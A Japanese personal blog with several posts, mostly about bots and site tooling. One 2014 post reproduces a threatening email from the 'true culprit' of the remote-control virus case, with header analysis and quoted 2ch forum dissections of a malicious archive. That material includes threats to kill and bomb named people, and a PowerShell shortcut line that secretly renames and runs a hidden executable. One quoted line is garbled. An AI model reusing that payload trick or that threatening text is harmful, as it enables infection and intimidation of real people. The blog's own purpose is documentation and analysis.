Hatena::ブログ(Diary)

satoru.netの自由帳 このページをアンテナに追加 RSSフィード

170630Friday

裁判が開始する10分前になるとツイート『傍聴bot』リリース

裁判の開始をツイートしてくれる『傍聴bot @bocho_bot』リリースしました。

事件番号、法廷、罪名、審議を法廷開始の10分前になると自動ツイートするよー


裁判傍聴のお供にどうぞ

151201Tueday

Yahoo!bot Slurpを間違って蹴ってしまって復活させるまでの対応メモ

なんとなく robots.txtYahoo!botを20分に1回にする設定をいれてもーた

User-agent: Slurp

Crawl-delay: 20

設定日は24日。

結果

botの来訪頻度数の集計

Bot-count:

date google yahoo bing

151122 389979 469378 308252

151123 346894 506160 335105

151124 475883 464205 229293

151125 455849 140855 65039

151126 677111 45337 60063

151127 809616 39890 60283

25日付近から、Yahoo!botの来訪頻度が急激に減少。

Seached-count:

date google yahoo bing

151122 74815 30360 535

151123 85434 36273 593

151124 70686 29407 504

151125 67178 27762 480

151126 65181 26309 481

151127 63056 25584 471

連動してYahoo!検索経由で来る数も減った……気がした。

googleエンジン使ってるから影響ないのかなーと思ってたけど、そうでもないよーだ

botを制限するrobots.txtの記述を消去

25日にやばいなーと気づいて、即robots.txtを戻したけど、

2日まてどrobots.txtが更新される気配がなかった。。

Yahoo!slurp担当者 にメールでrobots.txt更新依頼

https://help.yahoo.com/kb/SLN22600.html

Webmasters can contact Yahoo Support directly by emailing us at: crawl-support@yahoo-inc.com.

メールでサポートしてるようなのでググル翻訳使ってお願いしてみた。

Hi. I'm http://open2ch.net website administrator.

I have restricted bot in yahoo by mistake.

The setting of robots.txt was changed, so please renew.

@Before

User-agent: Slurp

Crawl-delay: 20

@After

(Without restriction)

best regards

返信がきた

Hello おーぷんかんりにん,

Thank you for reaching out to Yahoo with your request. I checked our history logs for your site's robots.txt file retrieval, we have confirmation that it's been received. Here's the log entry for your confirmation:

Fetched time

Sun Nov 29 19:42:28 2015

HTTP status

200

Content

Slurp will crawl your site without restriction. If you have any additional questions, feel free to write back.

Kind Regards,

Miguel Lopez

Crawl Support

治った

Bot-count:

date google yahoo bing

151129 799225 71750 60049 6804 3942 106399

151130 832523 273987 60769 6343 4060 93451

Seached-count:

date google yahoo bing

151129 74925 31056 418

151130 66158 26756 537

今日のわかった

  • 安易にYahoo!botを制限するとYahoo!経由のseoに影響するかも
  • Yahoo!robots.txtの更新はメールで依頼できる
  • 無事にrobos.txtの制限が解除されれば従来通りのbot数に復帰できる

botの数グラフ

f:id:satoru_net:20151202000856p:image

140601Sunday

[]【安部銃蔵】真犯人の名乗る人物からのまたメール(全文+ヘッダー)

本日、2014年6月1日00:00:30、遠隔操作の「真犯人」と名乗る人物からまたメールが届いた。

※便乗犯、摸倣犯の可能性もあるので、取り扱い要注意。

ヘッダー情報付き(メールのソース)

全文

@タイトル

安倍晋三の心臓に弾丸ぶち込んで自民党本部にロケット砲を撃ち込む自民党員と

アグネスのPCに児ポぶち込む札幌ガスボンベ大爆破霞ヶ関あぼーん唐沢貴洋あ

ぼーん西村博之あぼーん

@日付:

2014年6月1日 00:00:30

@From:

安部銃蔵 <onigoroshijuzo11111011110@yahoo.co.jp>

@To:

省略。前回の真犯人からのメールと同じあて先(25名)。メールの順番も同じ。

@本文

毎度忘れた頃に現れる真犯人でーす

といってこの事件が忘れられた頃にでも現れようかと思っていたのですが

これ以上片山さんを苦しめるのはさすがに気の毒なので特別にお知らせします。

今回片山さんに自作自演を指示し無実を一転させるよう仕向けたのはこの私です。

あらかじめ片山さんのプライバシー情報をゲットしていたので、従わなければ今まで入手したプライバシー情報を全て拡散するなどと言って脅しました。

連絡先や行動パターン等々も把握するのは容易いことでした。

片山氏が保釈後に尾行されているということも当然わかっていたので、これも利用されてもらいました。

あえて見晴らしの良い場所を彼自身に選択させました。彼は河川敷を選んだようですが、なかなかグッドなチョイスでした。

今回のために彼にスマホやPCをこっそり用意させ、onigoroshijuzo2014アカウントを発行させ私が作成した文章をコピペさせて公判中の時間にでもタイマーで送信するようにさせました。

その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

■どうやって指示したのか?

まず代行者に専用のURLのみ伝えさせました。片山さんに直接渡したのかどうしたかは知りません。監視者等考慮する必要があったので

手段タイミング等は代行者にお任せです

あ。代行者というのは私の共犯というわけではなく、そういう代行業者さんです。

指示内容とメール文はネット上に載せておきました。当然ですが既に削除済みです。

指示文は保存禁止にし、メール用の文章のみ彼の端末にコピペさせました。

ちなみにURLは記憶に残りにくいものにしたのでまず覚えていないでしょう。もちろん海外のサーバーです。

痕跡が残っているはずはありませんが、でもまあ頑張っていろいろ解析してみてください。何か手がかりが掴めるかもしれませんよ^^

片山氏や代行者へはいずれもこちらからの一方的(一方通行)な指示でしたので連絡を取り合うという形はとっていません。

やるかやらないかもあくまで片山氏自身の判断です。でもまあ弱みを握られてるんじゃ流石にせざるを得ませんよね(笑)

■その他

思っていたより順調だったので満足です。やはり高学歴さんはものわかりがいいですね。とても助かりました。

記念すべき5人目ということで人間遠隔操作の特別サプライズです。楽しんでいただけましたか?

今回片山さんはよく頑張ってくれました。

片山さん、佐藤弁護士、江川さん、その他片山さんを支えてきた方々ご苦労様でした。大変素晴らしいご活躍でした。

それにしても世間の皆さんひどい手のひらの返しようでしたねぇ。まったくヒドイ世の中ですねー

この遠隔操作事件というゲームは5人目で締めくくろうと思っていますが、今後、警察・検察の行いによってはまた新たな被害者が出るかもしれないのでくれぐれも注意してくださいね。

あ。今回この件について一番面白い報道をしてくれたテレビ局には、ご褒美に特製花火をプレゼントしてあげましょう

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253

■最後に

もし以上の事を刑務所に入る前に少しでも話してしまったら、片山さんのプライバシー情報全て流出させるように脅してあります。

でももういいです。終わりです。早く片山さんに伝えて楽にしてあげてください。

メールのデータ

@PDF

http://yokoku.in/enkaku2012/abejuzo_140601.pdf

@TXT

http://yokoku.in/enkaku2012/abejuzo_140601.txt

@ヘッダー情報付き(メールのソース)

http://yokoku.in/enkaku2012/abejuzo_140601_source.txt

発信元情報など。

@メーラー

YahooMailClassic/6.0.18 YahooMailWebService/0.8.111_53

Yahoo!のWebメーラーから送信している。(SMTPではない)

@送信日時

Sun, 01 Jun 2014 00:00:30 JST

ソース

Received: from [192.227.170.19] by web101405.mail.kks.yahoo.co.jp via HTTP; Sun, 01 Jun 2014 00:00:30 JST

X-Mailer: YahooMailClassic/6.0.18 YahooMailWebService/0.8.111_53

X-YMail-JAS: derF9KEVM1lathZJ7nDhFxBOU5DhzIbbOEyyzIRhW6eBav4OFWjzLqt7I_4d_ui6ANFJpfECtwqG4_EgQXOMpdjktjsK37qpUHQaLzApLmFh.PL54LTs8PHfHvCX82tcGSh4

Date: Sun, 1 Jun 2014 00:00:30 +0900 (JST)

@発信IP

192.227.170.19

現時点(2014/6/1)のtor statusによると、torのIPの模様。

このIPのルーター情報 (192.227.170.19)によるとアメリカのtor exitのようだ。

※いずれも2014/06/1 4:30時点のもの

簡単な考察

  • 今回のメールには遠隔操作「真犯人」しか知りえない情報、秘密の暴露などはない。
  • 前回以前の「真犯人」からのメールの送信時間帯(深夜帯・土日)とは一致している。
  • 送り先は25名で前回のメールの送り先と一致。ただし、あて先を知っているのは、送り先(報道関係者・個人)の25人と、その送り先の関係者、捜査機関、onigoroshijuzoのヤフーアカウントに不正ログインした記者+不特定多数。結果として、あて先が完全に一致していからといって100%真犯人である証明にはならない。
  • Torを経由してYahoo!メール(Web)から送信されている。このあたりの手法も前回以前と一致。
  • 今回のYahoo!のアカウントは onigoroshijuzo1111101111011111011110バイナリで 2014 の意味。前回の河川敷のメールはonigoroshijuzo2014だった。2014/6/1 4:07現時点ではアカウントはまだ稼働中ページのキャッシュ

矛盾点など

その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

  • 現実には片山氏は「適当に逃げて」おらず、自殺未遂後、自ら弁護士に連絡をした。警察も行動把握していなかった。

片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

  • 「真犯人」の指示で、自作自演で無実を一転させるよう仕向けだけなら、片山氏の自殺未遂の動機は?

メモ

便乗犯、愉快犯説
  • メールのあて先さえ入手できれば、第三者でも実現可能。
真犯人・協力者説
  • 従来の「真犯人」メールと時間帯(深夜&土日)の傾向、torを利用している点などは一致。
  • 遠隔操作事件の秘密の暴露などが一切ない為、100%「真犯人」だと確定できない。
片山氏による仕込み、自作自演説
  • 片山氏が失踪中に河川敷での行動の言い逃れの為にこのシナリオを考えて、タイマーをセットしてから収監された?
  • Yahoo!Webメールはtorを経由して自動送信する事は技術的に可能かどうかの検証が必要。(bot対策などで文字認証などが出てしまう可能性など)
  • 今回のメールの内容には失踪時点で判明している情報だけなので、失踪中に作成する事は実現可能。
  • 河川敷でのタイマー送信、捜査員の追跡、収監、今回のメールまで含めてすべて計画の一環だった?前回のタイマーでの逮捕はこれまでの慎重な真犯人と比較して、あまりにもずさんすぎて納得がいかない。との見方もあった。


関連リンク

真犯人がヒントで示しているスレッド

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253



ウイルスについての指摘(?)と思われる投稿

http://fox.2ch.net/test/read.cgi/poverty/1398876571/35

35 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 02:00:00.83 ID:3I146ai20

>>22

まとめ

rarの中身

 desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed

 mov.lnk: MS Windows shortcut

 thumbs.db: Macromedia Flash Video

 mov.lnkの内容というかプロパティ↓

 C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';

トラップのシナリオ

 ・解凍したらファイルが3つでてくる。

 ・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットがトリガー

 ・こいつをダブルクリックとか「開く」とかやると

   ・desktop.ini を、c:\temp\x.exe という名前にリネーム移動

   ・そいつを実行

アウトとセーフ

 ・解凍しただけならセーフ

 ・というか、mov ショートカットに触ってなければ問題ない

 ・ショートカットをダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫

 ・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん

   C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

thumbs.db

 JCかJSのウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像

http://fox.2ch.net/test/read.cgi/poverty/1398876571/529

529 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 03:23:35.26 ID:o7sFdkS+0

トレースしてみたが

これ想像以上にかなり悪質かも知れん。

まず、どっかと通信してるんだけど、

これがおそらく実行ファイル置き場。

今は何も置いてないみたいだから特に害はないが

この置き場に実行ファイルが置かれたら

勝手にPCにダウンロードして勝手に実行するようになってる模様。

さらにレジストリにも同時に書き込みをしており、

手動で消したところで「実行ファイルが消されたら新しい実行ファイルを生成」という

命令が出され、しかもファイル名を変えて実行ファイルが作成される。

vmcのサキュラバス関数をいじっており、

相当高難度なプログラムとなってる。

もっと分かりやすく箇条書きすると、

仝什澆里△蕕罎襯Εぅ襯好肇侫箸任話誼僚侏茲覆

▲侫.ぅ訝屬場との通信を常に行っており、そこに悪質な実行ファイル置かれたらおしまい

手動で消したところですでに常駐&レジストリいじりをされており、無駄

とりあえず、これから先、「何かされる」可能性が高いので

「今特に何も起こってないからセーフ」とは考えてはいけない。

「何かされる」のを防ぐ方法はある。PCの通信を遮断すること。

これなら現状のウイルスが常駐してようと、「成長」することはない。

情報はスマホやサブのノートPCなどで収集するといい。


記事など

遠隔操作ウイルス事件「真犯人」メールが再び届く 「早く片山さんに伝えて楽にしてあげてください」

2ちゃんねる現行スレ

嫌儲

111219Monday

『オレオレ詐欺速報 | 振り込め詐欺情報まとめサービス』はじめてみた

警視庁の発行する「めーるけいしちょう」をベースにオレオレ詐欺をまとめるサービスをはじめました。

(※「メールけいしちょう」の利用にあたり警視庁犯罪抑止対策本部の方より使用許可を頂きました。)


主な機能はこちら

オレオレ詐欺速報

日々発生したオレオレ詐欺の内容、地域などの詳細をページで確認できます。

f:id:satoru_net:20111219091518p:image

オレオレ詐欺の発生件数の推移グラフ

オレオレ詐欺の発生件数の年間推移。

f:id:satoru_net:20111219091156p:image

日々の推移。

f:id:satoru_net:20111219091152p:image

Twitter連動

オレオレ詐欺情報をリアルタイムにツイート速報

@oreore_botというアカウントで速報してます。

f:id:satoru_net:20111219093053p:image

地域別月間発生数統計

23区別、23区外での発生状況を一目で確認できます。

ちなみに今月12月は現時点で江東区(8件)が1位で、先月11月は大田区(13件)が1位でした。

月ごとに地域単位で

f:id:satoru_net:20111219091153p:image


月間トレンドワード分析

オレオレ詐欺の内容を形態素解析しどのようなワードが多い傾向があるかを月別に確認できます。

f:id:satoru_net:20111219091155p:image

検索機能

過去に発生した全データを対象にキーワード検索できます。

f:id:satoru_net:20111219091154p:image

オレオレ詐欺マップ

google mapでにオレオレ詐欺が発生した地域の確認ができます。

f:id:satoru_net:20111219091151p:image

今日のオレオレ詐欺発生件数

1日のオレオレ詐欺発生件数を表示してます。

f:id:satoru_net:20111219091150p:image


今後の予定

『オレオレhack API』

 オレオレ詐欺情報のAPIを引き出せるプラットフォーム公開

『オレオレコミュニティ』

 オレオレ詐欺に関する情報、体験談を投稿できるコミュニティー

『オレオレポート』

 分析した結果をMLで月次レポート

他都道府県にも対応

『めーるけいしちょう』とは

http://www.keishicho.metro.tokyo.jp/tetuzuki/mail/mail_info.htm

警視庁が提供する、東京都内各地域で発生した『犯罪発生情報』や犯罪を防ぐために必要な

『防犯情報』等をメールでお知らせするサービスです。

今回「メールけいしちょう」の利用にあたり警視庁犯罪抑止対策本部の方より使用許可を頂きました。

ただし、警視庁と当サービスの間には依託関係などは一切ありません。

111123Wedday

googleクローラーの速度はサイトによって違うメモ

googleウェブマスターツールでサイトによって最高速度の閾値が違うらしい。

何らかの基準でリミッターが増減するっぽい。実際、どーなんだろ?っていうメモ。

アクセスが多めのサイトA

f:id:satoru_net:20111123113412p:image

最近はじめたばっかのサイトB

f:id:satoru_net:20111123113413p:image

実際に設定通りきてるのかチェック:アクセスが多めのサイトA

最高3.6/sec、最少1.1/sec。平均的には2/secくらいのよーだ。

コマンド

sudo perl -e 'for(`grep "Googlebot" /var/log/httpd/access_log.111121`){$h{(m@\d{4}:(\d+)@)[0]}++} ; for("00".."23"){print qq{$_:00 $h{$_} @{[sprintf "%.1f",$h{$_}/3600]}/sec\n}}'

結果

00:00 4035 1.1/sec

01:00 6536 1.8/sec

02:00 11100 3.1/sec

03:00 10716 3.0/sec

04:00 9863 2.7/sec

05:00 12898 3.6/sec

06:00 10727 3.0/sec

07:00 8970 2.5/sec

08:00 8465 2.4/sec

09:00 8765 2.4/sec

10:00 9518 2.6/sec

11:00 10069 2.8/sec

12:00 10841 3.0/sec

13:00 12304 3.4/sec

14:00 10070 2.8/sec

15:00 10103 2.8/sec

16:00 10431 2.9/sec

17:00 9790 2.7/sec

18:00 9378 2.6/sec

19:00 7138 2.0/sec

20:00 7297 2.0/sec

21:00 8494 2.4/sec

22:00 7920 2.2/sec

23:00 4433 1.2/sec


実際に設定どおりにきているのかチェック:最近始めたばっかのサイトB

最高1.0/sec、最少0.5/sec。平均的には0.8/secくらいのよーだ。

結果

00:00 1933 0.5/sec

01:00 2152 0.6/sec

02:00 2590 0.7/sec

03:00 2520 0.7/sec

04:00 2704 0.8/sec

05:00 2446 0.7/sec

06:00 2164 0.6/sec

07:00 1842 0.5/sec

08:00 2677 0.7/sec

09:00 3449 1.0/sec

10:00 2854 0.8/sec

11:00 2440 0.7/sec

12:00 2324 0.6/sec

13:00 1697 0.5/sec

14:00 2030 0.6/sec

15:00 2200 0.6/sec

16:00 3223 0.9/sec

17:00 3290 0.9/sec

18:00 2726 0.8/sec

19:00 2451 0.7/sec

20:00 2587 0.7/sec

21:00 2379 0.7/sec

22:00 2462 0.7/sec

23:00 2760 0.8/sec

合計

$ sudo grep "Googlebot" /var/log/httpd/access_log.111121 | wc -l

219861

©satoru.net
Mail Twitter